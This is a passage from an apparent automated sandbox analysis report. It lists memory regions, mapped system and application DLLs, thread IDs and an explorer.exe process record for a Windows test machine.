"c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 783 start_va = 0x72df0000 end_va = 0x72e83fff entry_point = 0x72df0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 784 start_va = 0x24f0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 785 start_va = 0x2540000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 786 start_va = 0x2550000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 787 start_va = 0x2560000 end_va = 0x2560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 788 start_va = 0x2570000 end_va = 0x2570fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 789 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 790 start_va = 0x34d0000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 791 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 792 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 793 start_va = 0x2680000 end_va = 0x2680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002680000" filename = "" Region: id = 794 start_va = 0x36b0000 end_va = 0x37affff entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 795 start_va = 0x37b0000 end_va = 0x38affff entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 796 start_va = 0x3a30000 end_va = 0x3b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 797 start_va = 0x6c340000 end_va = 0x6c3b3fff entry_point = 0x6c340000 region_type = mapped_file name = "ssv.dll" filename = "\\Program Files\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\ssv.dll") Region: id = 798 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 799 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 800 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 801 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 802 start_va = 0x2690000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 803 start_va = 0x26a0000 end_va = 0x26a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026a0000" filename = "" Region: id = 804 start_va = 0x26b0000 end_va = 0x26b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 805 start_va = 0x3a20000 end_va = 0x3a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 806 start_va = 0x6c280000 end_va = 0x6c293fff entry_point = 0x6c280000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office14\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\msohev.dll") Region: id = 807 start_va = 0x6c2a0000 end_va = 0x6c330fff entry_point = 0x6c2a0000 region_type = mapped_file name = "urlredir.dll" filename = "\\Program Files\\Microsoft Office\\Office14\\URLREDIR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\urlredir.dll") Region: id = 808 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 809 start_va = 0x26c0000 end_va = 0x26c3fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 810 start_va = 0x26d0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 811 start_va = 0x26f0000 end_va = 0x2707fff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 812 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 813 start_va = 0x2720000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 814 start_va = 0x2730000 end_va = 0x273ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 815 start_va = 0x2740000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 816 start_va = 0x2750000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 817 start_va = 0x27a0000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 818 start_va = 0x27b0000 end_va = 0x27bffff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 819 start_va = 0x6c250000 end_va = 0x6c27dfff entry_point = 0x6c250000 region_type = mapped_file name = "jp2ssv.dll" filename = "\\Program Files\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\jp2ssv.dll") Region: id = 820 start_va = 0x3300000 end_va = 0x330ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 821 start_va = 0x6c190000 end_va = 0x6c24efff entry_point = 0x6c190000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Java\\jre7\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\msvcr100.dll") Region: id = 822 start_va = 0x27c0000 end_va = 0x27c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 823 start_va = 0x32f0000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 824 start_va = 0x6c130000 end_va = 0x6c18afff entry_point = 0x6c130000 region_type = mapped_file name = "deploy.dll" filename = "\\Program Files\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre7\\bin\\deploy.dll") Region: id = 825 start_va = 0x3230000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 826 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1233 start_va = 0x27c0000 end_va = 0x27d1fff entry_point = 0x27c0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1234 start_va = 0x27e0000 end_va = 0x27e7fff entry_point = 0x27e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\feeds cache\\index.dat") Region: id = 1235 start_va = 0x27f0000 end_va = 0x27fcfff entry_point = 0x27f0000 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 1236 start_va = 0x32b0000 end_va = 0x32b0fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 1237 start_va = 0x32c0000 end_va = 0x32c0fff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 1238 start_va = 0x32d0000 end_va = 0x32d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032d0000" filename = "" Region: id = 1239 start_va = 0x32e0000 end_va = 0x32e7fff entry_point = 0x32e0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1240 start_va = 0x6bbd0000 end_va = 0x6c186fff entry_point = 0x6bbd0000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 1241 start_va = 0x6ef70000 end_va = 0x6ef99fff entry_point = 0x6ef70000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1242 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003310000" filename = "" Region: id = 1243 start_va = 0x3320000 end_va = 0x3320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003320000" filename = "" Region: id = 1244 start_va = 0x3330000 end_va = 0x3331fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1245 start_va = 0x3340000 end_va = 0x3341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003340000" filename = "" Region: id = 1246 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 1247 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x3360000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 1248 start_va = 0x3c50000 end_va = 0x3d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 1249 start_va = 0x6dac0000 end_va = 0x6dacafff entry_point = 0x6dac0000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 1250 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1251 start_va = 0x3370000 end_va = 0x3373fff entry_point = 0x3370000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1252 start_va = 0x33c0000 end_va = 0x33c3fff entry_point = 0x33c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1253 start_va = 0x33f0000 end_va = 0x341ffff entry_point = 0x33f0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1254 start_va = 0x3420000 end_va = 0x3485fff entry_point = 0x3420000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1255 start_va = 0x3e40000 end_va = 0x3f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 1256 start_va = 0x6f040000 end_va = 0x6f27ffff entry_point = 0x6f040000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1257 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Thread: id = 32 os_tid = 0xc48 Thread: id = 33 os_tid = 0xc4c Thread: id = 34 os_tid = 0xc50 Thread: id = 35 os_tid = 0xc54 Thread: id = 36 os_tid = 0xc58 Thread: id = 37 os_tid = 0xc5c Thread: id = 38 os_tid = 0xc60 Thread: id = 39 os_tid = 0xc64 Thread: id = 40 os_tid = 0xc68 Thread: id = 42 os_tid = 0xc74 Thread: id = 43 os_tid = 0xc78 Thread: id = 44 os_tid = 0xc7c Thread: id = 45 os_tid = 0xc80 Thread: id = 79 os_tid = 0xc84 Thread: id = 81 os_tid = 0xc8c Process: id = "5" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7ea16320" os_pid = "0x5ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xc44" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 829 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 830 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 831 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 832 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 833 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 834 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 835 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 836 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 837 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 838 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 839 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 840 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 841 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 842 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 843 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 844 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 845 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 846 start_va = 0x2b0000 end_va = 0x2d6fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 847 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 848 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 849 start_va = 0x4f0000 end_va = 0x529fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 850 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 851 start_va = 0x540000 end_va = 0x599fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 852 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 853 start_va = 0x5b0000 end_va = 0x9a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 854 start_va = 0x9b0000 end_va = 0x9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 855 start_va = 0x9c0000 end_va = 0x9c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 856 start_va = 0x9d0000 end_va = 0x9d3fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 857 start_va = 0x9e0000 end_va = 0x9f7fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 858 start_va = 0xa00000 end_va = 0xc80fff entry_point = 0xa00000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 859 start_va = 0xc90000 end_va = 0x188ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 860 start_va = 0x1890000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 861 start_va = 0x1990000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 862 start_va = 0x1a20000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 863 start_va = 0x1a30000 end_va = 0x1a30fff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 864 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 865 start_va = 0x1a50000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 866 start_va = 0x1a60000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 867 start_va = 0x1aa0000 end_va = 0x1b7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001aa0000" filename = "" Region: id = 868 start_va = 0x1b80000 end_va = 0x1e4efff entry_point = 0x1b80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 869 start_va = 0x1e50000 end_va = 0x1e51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 870 start_va = 0x1e60000 end_va = 0x1e61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 871 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 872 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 873 start_va = 0x1ec0000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 874 start_va = 0x1f00000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 875 start_va = 0x1f40000 end_va = 0x1f42fff entry_point = 0x1f40000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 876 start_va = 0x1f50000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 877 start_va = 0x1f60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 878 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 879 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 880 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 881 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 882 start_va = 0x1fb0000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 883 start_va = 0x1fc0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 884 start_va = 0x1fd0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 885 start_va = 0x1fe0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 886 start_va = 0x1ff0000 end_va = 0x1ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 887 start_va = 0x2000000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 888 start_va = 0x2080000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 889 start_va = 0x2090000 end_va = 0x2090fff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 890 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 891 start_va = 0x20b0000 end_va = 0x20b0fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 892 start_va = 0x20c0000 end_va = 0x20c3fff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 893 start_va = 0x20d0000 end_va = 0x20d7fff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 894 start_va = 0x20e0000 end_va = 0x20e0fff entry_point = 0x20e0000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 895 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 896 start_va = 0x2100000 end_va = 0x2108fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 897 start_va = 0x2110000 end_va = 0x2110fff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 898 start_va = 0x2120000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 899 start_va = 0x2130000 end_va = 0x222ffff entry_point = 0x2130000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 900 start_va = 0x2230000 end_va = 0x232ffff entry_point = 0x2230000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 901 start_va = 0x2330000 end_va = 0x2355fff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 902 start_va = 0x2360000 end_va = 0x237efff entry_point = 0x2360000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 903 start_va = 0x2380000 end_va = 0x2380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 904 start_va = 0x2390000 end_va = 0x2393fff entry_point = 0x2390000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 905 start_va = 0x23a0000 end_va = 0x23cffff entry_point = 0x23a0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 906 start_va = 0x23d0000 end_va = 0x23d3fff entry_point = 0x23d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 907 start_va = 0x23e0000 end_va = 0x23e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 908 start_va = 0x23f0000 end_va = 0x23f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 909 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 910 start_va = 0x2410000 end_va = 0x2413fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 911 start_va = 0x2420000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 912 start_va = 0x2460000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 913 start_va = 0x24a0000 end_va = 0x24a3fff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 914 start_va = 0x24b0000 end_va = 0x24b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 915 start_va = 0x24c0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 916 start_va = 0x2500000 end_va = 0x2500fff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 917 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 918 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 919 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 920 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 921 start_va = 0x2580000 end_va = 0x2eaffff entry_point = 0x2580000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 922 start_va = 0x2eb0000 end_va = 0x2eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002eb0000" filename = "" Region: id = 923 start_va = 0x2ec0000 end_va = 0x2ec1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ec0000" filename = "" Region: id = 924 start_va = 0x2ed0000 end_va = 0x2ed3fff entry_point = 0x2ed0000 region_type = mapped_file name = "cversions.2.db" filename = 